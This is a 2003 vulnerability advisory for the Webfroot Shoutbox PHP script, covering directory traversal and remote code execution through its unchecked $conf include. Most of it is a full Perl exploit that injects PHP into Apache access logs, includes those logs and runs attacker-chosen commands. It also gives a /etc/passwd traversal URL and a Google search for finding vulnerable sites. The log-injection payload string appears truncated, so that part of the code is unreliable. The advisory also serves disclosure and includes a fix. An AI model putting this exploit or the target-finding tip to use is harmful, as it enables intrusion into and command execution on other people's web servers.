Products: Webfroot Shoutbox v 2.32 and below (http://shoutbox.sf.net) Date: 09 May 2003 Author: pokleyzz Contributors: sk_at_scan-associates.net shaharil_at_scan-associates.net munir_at_scan-associates.net URL: http://www.scan-associates.net Summary: Webfroot Shoutbox 2.32 and below directory traversal and code injection. Description =========== Webfroot Shoutbox is PHP script released under the GPL. Also known as a tagboard or a blabbox, shoutboxes allow visitors to your website to leave messages to other visitors quickly and easily. Details ======= User can view any readable file on system where webfroot shoutbox is running using $conf variable. i) Shoutbox v2.32 shoutbox.php line 43 ------------------------------------------------------------------- if (!isset($conf)) { $conf="shoutboxconf.php"; } else { # michel v was there $conf = str_replace(':', '', $conf); // hi cross-site scripting, bye cross-site scripting $conf = str_replace('%3a', '', $conf); // hi cross-site scripting, bye cross-site scripting } require_once ($conf); ------------------------------------------------------------------- ii) Shoutbox v2.31 shoutbox.php line 43 ------------------------------------------------------------------- if (!isset($conf)) { $conf="shoutboxconf.php"; } require_once ($conf); -------------------------------------------------------------------- Proof of concept ================ a) View any readable file http://blablabla.com/shoutbox.php?conf=../../../../../../../etc/passwd b) Remote command execution i) for version 2.31 user can remotely include file. ii) version 2.32 user can use apache access_log to include php code [see attachment] Workaround ========== Append to line 48 of shoutbox.php $conf = str_replace('./', '', $conf); // to avoid directory traversal Tips ==== Search for ":: Shoutbox" at www.google.com can easily identify vulnerable site (129,000 result) --- start jeritan_batinku.pl PoC exploit --- #!/usr/bin/perl # # Webfroot Shoutbox < 2.32 on apache exploit # by pokleyzz of d'scan clanz # # Greet: # tynon, sk ,wanvadder, flyguy, sutan ,spoonfork, tenukboncit, kerengge_kurus , # s0cket370 , b0iler and d'scan clan. # # Shout to: # #vuln , #mybsd , #mylinux # # Just for fun :). Weekend stuff .. # use IO::Socket; my $host = "127.0.0.1"; my $port = 80; my $shoutbox = "shoutbox.php?conf="; my $shoutboxpath = "/shoutbox"; my $cmd = "ls -l"; my $conn; my $type; my @logs = ( "/etc/httpd/logs/acces_log", "/etc/httpd/logs/acces.log", "/var/www/logs/access_log", "/var/www/logs/access.log", "/usr/local/apache/logs/access_log", "/usr/local/apache/logs/access.log", "/var/log/apache/access_log", "/var/log/apache/access.log", "/var/log/httpd/access_log", "/var/log/httpd/access.log", #"D:/apps/Apache Group/Apache2/logs/access.log" ); my $qinit = "GET /');fclose(\$h);?> HTTP/1.1\nHost: 127.0.0.1\nConnection: Close\n\n"; my $conn; if ($ARGV[0] eq "x" || $ARGV[0] eq "r"){ $type = $ARGV[0]; } else { print "[x] Webfroot Shoutbox < 2.32 on apache exploit \n\tby pokleyzz of d' scan clan\n\n"; print "Usage: \n jeritan_batinku.pl (x|r) host [command] [path] [port]\n"; print "\ttype\tx = exploit | r = run command (after run with x option)\n"; print "\thost\thostname\n"; print "\tcommand\tcommand to execute on remote server\n"; print "\tpath\tpath to shoutbox installation ex: /shoutbox\n"; print "\tport\tport number\n"; exit; } if ($ARGV[1]){ $host = $ARGV[1]; } if ($ARGV[2]){ $cmd = $ARGV[2]; } if ($ARGV[3]){ $shoutboxpath = $ARGV[3]; } if ($ARGV[4]){ $port = int($ARGV[4]); } $cmd =~ s/ /+/g; sub connect_to { #print "[x] Connect to $host on port $port ...\n"; $conn = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => "$host", PeerPort => "$port", ) or die "[*] Can't connect to $host on port $port ...\n"; $conn-> autoflush(1); } sub connect_end { #print "[x] Close connection\n"; close($conn); } sub exploit { my $access_log = $_[0]; my $result = ""; $access_log =~ s/ /+/g; my $query = "GET ${shoutboxpath}/${shoutbox}${access_log} HTTP/1.1\nHost: $host\nConnection: Close\n\n"; print "$query"; print "[x] Access log : ", $access_log ,"\n"; &connect_to; print $conn $query; while ($line = <$conn>) { $result = $line; #print $result; }; &connect_end; } sub run_cmd { my $conf="/tmp/.ex"; #my $conf="d:/tmp/.ex"; my $result = ""; my $query = "GET ${shoutboxpath}/${shoutbox}${conf}&cmd=$cmd HTTP/1.1\nHost: $host\nConnection: Close\n\n"; print "[x] Run command ...\n"; &connect_to; print $conn $query; while ($line = <$conn>) { $result .= $line; }; &connect_end; if ($result =~ /Result:/){ print $result; } else { print $result; print "[*] Failed ..."; } } sub insert_code { my $result = ""; print "[x] Access log : ", $access_log ,"\n"; print "[x] Insert php code into apache access log ...\n"; &connect_to; print $conn "$qinit"; while ($line = <$conn>) { $result .= $line; }; &connect_end; print $result; } if ($type eq "x"){ &insert_code; print "[x] Trying to exploit ...\n"; for ($i = 0;$i <= $#logs; $i++){ &exploit($logs[$i]); } &run_cmd; } else { &run_cmd; }